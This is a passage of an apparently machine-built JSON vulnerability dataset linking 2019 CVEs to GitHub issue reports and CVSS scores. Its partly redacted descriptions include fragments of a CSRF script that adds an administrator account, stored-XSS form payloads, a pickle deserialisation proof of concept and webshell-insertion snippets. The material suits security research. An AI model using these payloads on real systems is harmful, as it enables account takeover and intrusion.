tainted data to be written in the log file without prior input validation. Whitelisting may be used to properly validate the data. Debug Logs None",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2019-7352",
        "Issue_Url_old": "https://github.com/ZoneMinder/zoneminder/issues/2475",
        "Issue_Url_new": "https://github.com/zoneminder/zoneminder/issues/2475",
        "Repo_new": "zoneminder/zoneminder",
        "Issue_Created_At": "2019-01-24T22:15:13Z",
        "description": "Self Stored Cross Site Scripting (XSS) FILETAG . Describe Your Environment APITAG NUMBERTAG Installed from ppa:iconnor/zoneminder master Describe the bug The view Run State , does no input validation to the value supplied to New State field & processes it further storing the value into the database without any prior filtration, leading to stored XSS. To Reproduce Affected URL : FILETAG POST Data APITAG Payload used APITAG Navigate to the Affected URL and set value of New State with payload Click on Download and Payload would be triggered. APITAG APITAG Expected behavior Proper escaping of special characters. Debug Logs None",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2019-7395",
        "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/1451",
        "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/1451",
        "Repo_new": "imagemagick/imagemagick",
        "Issue_Created_At": "2019-01-17T03:11:55Z",
        "description": "memory leak in APITAG in coders/psd.c. Prerequisites x] I have written a descriptive issue title [x] I have verified that I am using the latest version of APITAG [x] I have searched [open URLTAG and closed URLTAG issues to ensure it has not already been reported Description APITAG memory leak in APITAG in coders/psd.c Steps to Reproduce APITAG quality NUMBERTAG image_info >quality APITAG quality; if APITAG != Z_OK) //line NUMBERTAG APITAG return NUMBERTAG line NUMBERTAG ERRORTAG c if APITAG != Z_OK) //line NUMBERTAG APITAG + compressed_pixels=(unsigned char ) APITAG + compressed_pixels); return NUMBERTAG System Configuration APITAG APITAG version: APITAG APITAG Environment APITAG system, version and so on): Ubuntu NUMBERTAG Additional information: APITAG Credit to Bingchang Liu at VARAS of IIE",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2019-7396",
        "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/1452",
        "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/1452",
        "Repo_new": "imagemagick/imagemagick",
        "Issue_Created_At": "2019-01-17T04:06:51Z",
        "description": "Potential Memory Leak in APITAG in coders/sixel.c. Prerequisites x] I have written a descriptive issue title [x] I have verified that I am using the latest version of APITAG [x] I have searched [open URLTAG and closed URLTAG issues to ensure it has not already been reported Description APITAG potential memory leak in APITAG in sixel.c Steps to Reproduce APITAG max_x || imsy > max_y) { // line NUMBERTAG dmsx = max_x; dmsy = max_y; if APITAG == APITAG { imbuf = (unsigned char ) APITAG return APITAG } if ((dmbuf = (unsigned char ) APITAG , dmsy)) == NULL) { //line NUMBERTAG imbuf = (unsigned char ) APITAG return APITAG } for (y NUMBERTAG y APITAG columns,&image >rows,&sixel_palette,&image >colors,exception) == APITAG // line NUMBERTAG sixel_buffer=(char ) APITAG ERRORTAG } sixel_buffer=(char ) APITAG image >depth NUMBERTAG image APITAG APITAG >columns,image >rows,exception); if (status == APITAG { sixel_pixels=(unsigned char ) APITAG // line NUMBERTAG sixel_palette=(unsigned char ) APITAG APITAG } ERRORTAG c if (sixel_decode(image,(unsigned char ) APITAG >columns,&image >rows,&sixel_palette,&image >colors,exception) == APITAG { sixel_buffer=(char ) APITAG + sixel_pixels=(unsigned char ) APITAG ERRORTAG } ` System Configuration APITAG APITAG version: APITAG APITAG Environment APITAG system, version and so on): Ubuntu NUMBERTAG Additional information: APITAG Credit to Bingchang Liu at VARAS of IIE",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2019-7397",
        "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/1454",
        "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/1454",
        "Repo_new": "imagemagick/imagemagick",
        "Issue_Created_At": "2019-01-17T11:10:56Z",
        "description": "Potential Memory Leak in APITAG in coders/pdf.c different from NUMBERTAG Prerequisites x] I have written a descriptive issue title [x] I have verified that I am using the latest version of APITAG [x] I have searched [open URLTAG and closed URLTAG issues to ensure it has not already been reported Description APITAG Potential memory leak in function APITAG in coders/pdf.c, which is similar to but different from NUMBERTAG Steps to Reproduce APITAG APITAG version: APITAG APITAG Environment APITAG system, version and so on): Ubuntu NUMBERTAG S Code Additional information: code review APITAG Credit to Bingchang Liu of VARAS of IIE",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2019-7398",
        "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/1453",
        "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/1453",
        "Repo_new": "imagemagick/imagemagick",
        "Issue_Created_At": "2019-01-17T06:50:47Z",
        "description": "Potential Memory Leak in APITAG in coders/dib.c. Prerequisites x] I have written a descriptive issue title [x] I have verified that I am using the latest version of APITAG [x] I have searched [open URLTAG and closed URLTAG issues to ensure it has not already been reported Description APITAG memory leak in APITAG in coders/dib.c Steps to Reproduce APITAG compression != APITAG //line NUMBERTAG size_t length; / Convert run length encoded raster pixels. / length NUMBERTAG UL (bytes_per_line NUMBERTAG UL NUMBERTAG UL; dib_data=(unsigned char ) APITAG // line NUMBERTAG image >rows NUMBERTAG UL) sizeof( dib_data)); if (dib_data == (unsigned char ) NULL) { pixels=(unsigned char ) APITAG ERRORTAG } APITAG int) APITAG pixels,dib_data); pixels=(unsigned char ) APITAG pixels=dib_data; // line NUMBERTAG APITAG = BI_RLE8; } APITAG c if (image >storage_class == APITAG //line NUMBERTAG if APITAG APITAG APITAG version: APITAG APITAG Environment APITAG system, version and so on): Ubuntu NUMBERTAG Additional information: APITAG Credit to Bingchang Liu at VARAS of IIE",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2019-7402",
        "Issue_Url_old": "https://github.com/panghusec/exploit/issues/8",
        "Issue_Url_new": "https://github.com/panghusec/exploit/issues/8",
        "Repo_new": "panghusec/exploit",
        "Issue_Created_At": "2019-02-05T12:38:18Z",
        "description": "Home Storage XSS base on csrf. Attackers can get any user's access credentials and do otherthing APITAG download the phpmywind the Latest version from FILETAG NUMBERTAG install it APITAG source code FILETAG Did not do any filtering Causing storage xss and CSRF exists at the change QQ number ]( URLTAG APITAG csrf poc. Phishing admin accessing malicious pages ERRORTAG NUMBERTAG Then go back to the home page ![ URLTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2019-7403",
        "Issue_Url_old": "https://github.com/panghusec/exploit/issues/9",
        "Issue_Url_new": "https://github.com/panghusec/exploit/issues/9",
        "Repo_new": "panghusec/exploit",
        "Issue_Created_At": "2019-02-05T12:42:54Z",
        "description": "Arbitrary File Delete Vulnerability. Attackers can Delete any file on the system APITAG download the phpmywind the Latest version from FILETAG NUMBERTAG install it NUMBERTAG login as Admin APITAG is a bbb folder under the c drive ]( URLTAG APITAG the URL in the browser FILETAG NUMBERTAG success ![ URLTAG APITAG URLTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:H/A:N",
        "severity": "MEDIUM",
        "baseScore": 4.9,
        "impactScore": 3.6,
        "exploitabilityScore": 1.2
    },
    {
        "CVE_ID": "CVE-2019-7537",
        "Issue_Url_old": "https://github.com/pytroll/donfig/issues/5",
        "Issue_Url_new": "https://github.com/pytroll/donfig/issues/5",
        "Repo_new": "pytroll/donfig",
        "Issue_Created_At": "2019-02-11T02:33:17Z",
        "description": "APITAG method is vulnerable. coding=utf NUMBERTAG import APITAG as test APITAG PATHTAG APITAG Hi, there is a vulnerability in collect_yaml(paths) method in APITAG please see APITAG above. It can execute arbitrary python commands resulting in command execution.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2019-7539",
        "Issue_Url_old": "https://github.com/rossant/ipycache/issues/47",
        "Issue_Url_new": "https://github.com/rossant/ipycache/issues/47",
        "Repo_new": "rossant/ipycache",
        "Issue_Created_At": "2019-02-11T05:43:32Z",
        "description": "APITAG method is vulnerable. import os import pickle import ipycache class Test(object): def __init__(self): self.a NUMBERTAG def __reduce__(self): return APITAG tmpdaa = APITAG with open(\"a APITAG as f: APITAG APITAG APITAG APITAG function with evil data will cause command execution,if attack share evil data on internet, when user load it , it will cause command execution.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2019-7559",
        "Issue_Url_old": "https://github.com/Boolector/boolector/issues/30",
        "Issue_Url_new": "https://github.com/boolector/boolector/issues/30",
        "Repo_new": "boolector/boolector",
        "Issue_Created_At": "2019-01-15T17:48:48Z",
        "description": "Out of Bounds write in pusht_bfr. While fuzzing boolector, APITAG APITAG this input file APITAG APITAG APITAG was found, which leads to an out of bounds write, according to valgrind. The attached file contains more lines leading to the same crash, the above file contains the minimal version. FILETAG FILETAG FILETAG APITAG APITAG ASAN trace (probably not useful, since it does not find the write) APITAG ERRORTAG APITAG APITAG APITAG Valgrind trace APITAG ERRORTAG APITAG Used version APITAG Steps to reproduce APITAG",
        "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2019-7560",
        "Issue_Url_old": "https://github.com/Boolector/boolector/issues/28",
        "Issue_Url_new": "https://github.com/boolector/boolector/issues/28",
        "Repo_new": "boolector/boolector",
        "Issue_Created_At": "2019-01-15T17:10:27Z",
        "description": "Use After Free in btor_delete. While fuzzing boolector, APITAG APITAG this input file APITAG ERRORTAG APITAG was found, which leads to a use after free in btor_delete. The attached file contains more lines leading to the same crash, the above file contains the minimal version. FILETAG FILETAG FILETAG APITAG APITAG ASAN trace APITAG ERRORTAG APITAG APITAG APITAG trace APITAG ERRORTAG APITAG Used version APITAG Steps to reproduce APITAG",
        "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2019-7566",
        "Issue_Url_old": "https://github.com/cskaza/cszcms/issues/17",
        "Issue_Url_new": "https://github.com/cskaza/cszcms/issues/17",
        "Repo_new": "cskaza/cszcms",
        "Issue_Created_At": "2019-01-17T02:13:39Z",
        "description": "There is one CSRF vulnerability that can add the administrator account. After the administrator logged in, open the following page poc\uff1a APITAG add a administrator APITAG APITAG APITAG APITAG '', '/') APITAG APITAG function APITAG { var xhr = new APITAG APITAG PATHTAG true); APITAG Type\", \"multipart\\/form data; boundary= APITAG APITAG PATHTAG \\/ ; APITAG APITAG Language\", \"zh CN,zh; APITAG APITAG = true; var body = \" APITAG \" + APITAG Disposition: form data; name= csrf_csz \" + \" \" + APITAG \" + \" APITAG \" + APITAG Disposition: form data; name= name \" + \" \" + \"test3 \" + \" APITAG \" + APITAG Disposition: form data; name= email \" + \" \" + \" EMAILTAG \" + \" APITAG \" + APITAG Disposition: form data; name= password \" + \" \" + \"test3 \" + \" APITAG \" + APITAG Disposition: form data; name= con_password \" + \" \" + \"test3 \" + \" APITAG \" + APITAG Disposition: form data; name= group NUMBERTAG APITAG \" + APITAG Disposition: form data; name= active NUMBERTAG APITAG \" + APITAG Disposition: form data; name= first_name \" + \" \" + \"te \" + \" APITAG \" + APITAG Disposition: form data; name= last_name \" + \" \" + \"st \" + \" APITAG \" + APITAG Disposition: form data; name= year NUMBERTAG APITAG \" + APITAG Disposition: form data; name= month NUMBERTAG APITAG \" + APITAG Disposition: form data; name= day NUMBERTAG APITAG \" + APITAG Disposition: form data; name= gender \" + \" \" + \"male \" + \" APITAG \" + APITAG Disposition: form data; name= address NUMBERTAG APITAG \" + APITAG Disposition: form data; name= phone NUMBERTAG APITAG \" + APITAG Disposition: form data; name= file_upload ; filename= \" + APITAG Type: application/octet stream \" + \" \" + \" \" + \" APITAG \" + APITAG Disposition: form data; name= submit \" + \" \" + APITAG \" + \" APITAG \"; var APITAG = new APITAG for (var i NUMBERTAG i APITAG APITAG APITAG APITAG APITAG APITAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2019-7567",
        "Issue_Url_old": "https://github.com/caokang/waimai/issues/10",
        "Issue_Url_new": "https://github.com/caokang/waimai/issues/10",
        "Repo_new": "caokang/waimai",
        "Issue_Created_At": "2019-01-07T05:48:22Z",
        "description": "There are Storage type xss vulnerabilities in the add administrator NUMBERTAG Presence address POST APITAG NUMBERTAG data pack POST APITAG HTTP NUMBERTAG Host: localhost NUMBERTAG Content Length NUMBERTAG Cache Control: max age NUMBERTAG Origin: URLTAG Upgrade Insecure Requests NUMBERTAG User Agent: Mozilla NUMBERTAG APITAG NT NUMBERTAG WOW NUMBERTAG APITAG (KHTML, like Gecko) APITAG Safari NUMBERTAG SE NUMBERTAG APITAG NUMBERTAG Content Type: multipart/form data; boundary= APITAG Accept: PATHTAG / ;q NUMBERTAG Referer: URLTAG Accept Encoding: gzip, deflate Accept Language: zh CN,zh;q NUMBERTAG Cookie: APITAG NUMBERTAG b NUMBERTAG c NUMBERTAG f NUMBERTAG e8ae3d NUMBERTAG APITAG NUMBERTAG cke NUMBERTAG laig NUMBERTAG APITAG Connection: close APITAG Content Disposition: form data; name=\"username\" '> APITAG alert NUMBERTAG APITAG APITAG Content Disposition: form data; name=\"password\" '> APITAG alert NUMBERTAG APITAG APITAG Content Disposition: form data; name=\"repassword\" '> APITAG alert NUMBERTAG APITAG APITAG NUMBERTAG Proof screenshot \u622a\u56fe\u89c1: FILETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2019-7568",
        "Issue_Url_old": "https://github.com/baijiacms/baijiacmsV4/issues/2",
        "Issue_Url_new": "https://github.com/baijiacms/baijiacmsv4/issues/2",
        "Repo_new": "baijiacms/baijiacmsv4",
        "Issue_Created_At": "2019-01-08T07:03:58Z",
        "description": "Two Vulnerability of Time based SQL injection NUMBERTAG description Two time based SQL blinds to get data NUMBERTAG POC First: URLTAG second: URLTAG NUMBERTAG description request the url: URLTAG No time delay Screenshot: FILETAG request the url: URLTAG time delay Screenshot: FILETAG Test with sqlmap: FILETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2019-7569",
        "Issue_Url_old": "https://github.com/millken/doyocms/issues/1",
        "Issue_Url_new": "https://github.com/millken/doyocms/issues/1",
        "Repo_new": "millken/doyocms",
        "Issue_Created_At": "2019-01-17T13:42:28Z",
        "description": "There is a CSRF vulnerability that can add the super administrator account . After the super administrator logged in, open the following page poc\uff1a APITAG add a super administrator CODETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2019-7581",
        "Issue_Url_old": "https://github.com/libming/libming/issues/173",
        "Issue_Url_new": "https://github.com/libming/libming/issues/173",
        "Repo_new": "libming/libming",
        "Issue_Created_At": "2019-01-17T09:18:12Z",
        "description": "Memory allocation failure in APITAG (parser.c NUMBERTAG different from NUMBERTAG ersion: master( commit APITAG ) command: listswf $FILE OS: Ubuntu NUMBERTAG LTS NUMBERTAG bit ERRORTAG Download: poc URLTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2019-7582",
        "Issue_Url_old": "https://github.com/libming/libming/issues/172",
        "Issue_Url_new": "https://github.com/libming/libming/issues/172",
        "Repo_new": "libming/libming",
        "Issue_Created_At": "2019-01-17T09:17:38Z",
        "description": "Memory allocation failure in APITAG APITAG version: master( commit APITAG ) command: listswf $FILE OS: Ubuntu NUMBERTAG LTS NUMBERTAG bit ERRORTAG Download: poc URLTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2019-7585",
        "Issue_Url_old": "https://github.com/caokang/waimai/issues/11",
        "Issue_Url_new": "https://github.com/caokang/waimai/issues/11",
        "Repo_new": "caokang/waimai",
        "Issue_Created_At": "2019-01-17T08:03:07Z",
        "description": "A Time based blind SQL Injection in email check. When registering a new account, it will verify that the email address is being used. PATHTAG ERRORTAG We can bypass the SQL filter using this payload: APITAG FILETAG The final SQL statement would be APITAG And here is the exp to obtain admin's password hash: CODETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2019-7648",
        "Issue_Url_old": "https://github.com/FantasticLBP/Hotels_Server/issues/2",
        "Issue_Url_new": "https://github.com/fantasticlbp/hotels_server/issues/2",
        "Repo_new": "fantasticlbp/hotels_server",
        "Issue_Created_At": "2019-01-20T15:01:48Z",
        "description": "Using of BASE NUMBERTAG Encoding for storage of password and retrieval of password. The application uses B NUMBERTAG encoding for storage of password Obscuring a password with a trivial encoding does not protect the password. FILETAG CVETAG URLTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2019-7649",
        "Issue_Url_old": "https://github.com/arterli/CmsWing/issues/41",
        "Issue_Url_new": "https://github.com/arterli/cmswing/issues/41",
        "Repo_new": "arterli/cmswing",
        "Issue_Created_At": "2019-02-17T18:32:15Z",
        "description": "Encryption of password using MD5 and fixed salt. APITAG = function(password, md5encoded) { md5encoded = md5encoded || false; password = md5encoded ? password : APITAG return APITAG + password + APITAG };",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2019-7662",
        "Issue_Url_old": "https://github.com/WebAssembly/binaryen/issues/1872",
        "Issue_Url_new": "https://github.com/webassembly/binaryen/issues/1872",
        "Repo_new": "webassembly/binaryen",
        "Issue_Created_At": "2019-01-16T07:22:23Z",
        "description": "Assertion failed were discovered in APITAG in wasm APITAG Hi there, Multiple Assertion failed were discovered in APITAG in wasm binary.cpp Here are the POC files. Please use \"./wasm opt $POC\" to reproduce the error. FILETAG $git log CODETAG The output was shown as follow: CODETAG The ASAN dumps the stack trace as follows: ERRORTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2019-7697",
        "Issue_Url_old": "https://github.com/axiomatic-systems/Bento4/issues/351",
        "Issue_Url_new": "https://github.com/axiomatic-systems/bento4/issues/351",
        "Repo_new": "axiomatic-systems/bento4",
        "Issue_Created_At": "2019-01-01T09:47:39Z",
        "description": "Multiple Assertion failed were discovered in APITAG ) in APITAG Hi there, Multiple Assertion failed were discovered in APITAG ) in APITAG Here are the POC files. Please use \"./mp NUMBERTAG hls $POC\" to reproduce the error. FILETAG The output were shown as follow: CODETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2019-7698",
        "Issue_Url_old": "https://github.com/axiomatic-systems/Bento4/issues/354",
        "Issue_Url_new": "https://github.com/axiomatic-systems/bento4/issues/354",
        "Repo_new": "axiomatic-systems/bento4",
        "Issue_Created_At": "2019-01-01T10:46:25Z",
        "description": "when running mp4dump, there is a out of memory problem in APITAG in APITAG Hi, there. I test the program at the master branch. ERRORTAG An Out of Memory problem was discovered in function APITAG in APITAG The program tries to allocate with a large number size NUMBERTAG eff NUMBERTAG bytes) of memory. Please use the \"./mp4dump $POC\" to reproduce the bug. FILETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2019-7699",
        "Issue_Url_old": "https://github.com/axiomatic-systems/Bento4/issues/355",
        "Issue_Url_new": "https://github.com/axiomatic-systems/bento4/issues/355",
        "Repo_new": "axiomatic-systems/bento4",
        "Issue_Created_At": "2019-01-01T11:33:09Z",
        "description": "When running avcinfo, a heap buffer overflow occur in function APITAG in APITAG Hi, there. A Heap buffer overflow problem was discovered in function APITAG char const , unsigned int) in APITAG A crafted input can cause segment faults and I have confirmed them with address sanitizer too. Here are the POC files. Please use \"./avcinfo $POC\" to reproduce the error. FILETAG ERRORTAG $ git log ERRORTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2019-7701",
        "Issue_Url_old": "https://github.com/WebAssembly/binaryen/issues/1863",
        "Issue_Url_new": "https://github.com/webassembly/binaryen/issues/1863",
        "Repo_new": "webassembly/binaryen",
        "Issue_Created_At": "2019-01-12T11:46:51Z",
        "description": "A Heap buffer overflow problem was discovered in function APITAG in wasm s parser.cpp in wasm.. Hi, there. A Heap buffer overflow problem was discovered in function APITAG in wasm s parser.cpp in wasm. A crafted wasm input can cause segment faults and I have confirmed them with address sanitizer too. Here are the POC files. Please use \"./wasm2js $POC\" to reproduce the error. FILETAG The ASAN dumps the stack trace as follows: ERRORTAG $ git log ERRORTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2019-7702",
        "Issue_Url_old": "https://github.com/WebAssembly/binaryen/issues/1867",
        "Issue_Url_new": "https://github.com/webassembly/binaryen/issues/1867",
        "Repo_new": "webassembly/binaryen",
        "Issue_Created_At": "2019-01-13T12:08:46Z",
        "description": "Null pointer Deference in APITAG in wasm s APITAG Hi, there. A Null pointer Deference problem was discovered in APITAG in wasm s APITAG A crafted wasm input can cause segment faults and I have confirmed them with address sanitizer too. Here are the POC files. Please use \" APITAG \" or \" APITAG \" to reproduce the problem. FILETAG The ASAN dumps the stack trace as follows: ERRORTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2019-7703",
        "Issue_Url_old": "https://github.com/WebAssembly/binaryen/issues/1865",
        "Issue_Url_new": "https://github.com/webassembly/binaryen/issues/1865",
        "Repo_new": "webassembly/binaryen",
        "Issue_Created_At": "2019-01-12T12:32:49Z",
        "description": "A Use after free problem in APITAG ) function in wasm APITAG Hi, there. A Use after free problem was discovered in APITAG ) function in wasm APITAG A crafted wasm input can cause segment faults and I have confirmed them with address sanitizer too. Here are the POC files. Please use \"./wasm merge $POC\" to reproduce the error. FILETAG $ git log ERRORTAG The ASAN dumps the stack trace as follows: ERRORTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2019-7704",
        "Issue_Url_old": "https://github.com/WebAssembly/binaryen/issues/1866",
        "Issue_Url_new": "https://github.com/webassembly/binaryen/issues/1866",
        "Repo_new": "webassembly/binaryen",
        "Issue_Created_At": "2019-01-12T12:56:27Z",
        "description": "Out of Memory Problem in function APITAG long). Hi, there. A Out of Memory problem was discovered in APITAG long) function in wasm APITAG A crafted wasm input can cause segment faults and I have confirmed them with address sanitizer too NUMBERTAG Program Abort because of std::bad_alloc exception. Use \"./wasm merge $POC\" to reproduce the error. FILETAG Program Output APITAG The ASAN dumps the stack trace as follows: ERRORTAG NUMBERTAG possibly invalid request for silly amounts of memory Use \"wasm opt $POC\" to reproduce the error. FILETAG Program Output ERRORTAG The ASAN dumps the stack trace as follows: ERRORTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2019-7719",
        "Issue_Url_old": "https://github.com/dignajar/nibbleblog/issues/138",
        "Issue_Url_new": "https://github.com/dignajar/nibbleblog/issues/138",
        "Repo_new": "dignajar/nibbleblog",
        "Issue_Created_At": "2019-01-28T02:55:24Z",
        "description": "one can insert malicious code in the installation process to get a web shell. In the CMS installation process, the configuration file filtering is not rigorous, you can insert malicious code in the installation process to execute arbitrary commands, and even get Webshell Source: . APITAG NUMBERTAG text = '<?php $_USER FILETAG exploit: URLTAG FILETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2019-7720",
        "Issue_Url_old": "https://github.com/taogogo/taocms/issues/1",
        "Issue_Url_new": "https://github.com/taogogo/taocms/issues/1",
        "Repo_new": "taogogo/taocms",
        "Issue_Created_At": "2019-01-28T14:34:00Z",
        "description": "one can insert malicious code in the installation process to get a web shell. In the CMS installation process, the configuration file filtering is not rigorous, you can insert malicious code in the installation process to execute arbitrary commands, and even get Webshell Source: . APITAG NUMBERTAG APITAG $_POST FILETAG exploit: URLTAG FILETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2019-7721",
        "Issue_Url_old": "https://github.com/gnat/nc-cms/issues/14",
        "Issue_Url_new": "https://github.com/gnat/nc-cms/issues/14",
        "Repo_new": "gnat/nc-cms",
        "Issue_Created_At": "2019-01-29T02:46:52Z",
        "description": "There is an vulnerability in the filesystem that can get a webshell . Hello, I found that this cms may have some security problem(use default file storage) Source: PATHTAG function APITAG $data) { $path = PATHTAG $fh = APITAG 'w') or ERRORTAG not open file: \".$name.\". Make sure that this server has read and write permissions the /nc cms/content APITAG fwrite($fh, $data); fclose($fh); } PATHTAG else if($action == 'save') { $this APITAG if(isset($_GET FILETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
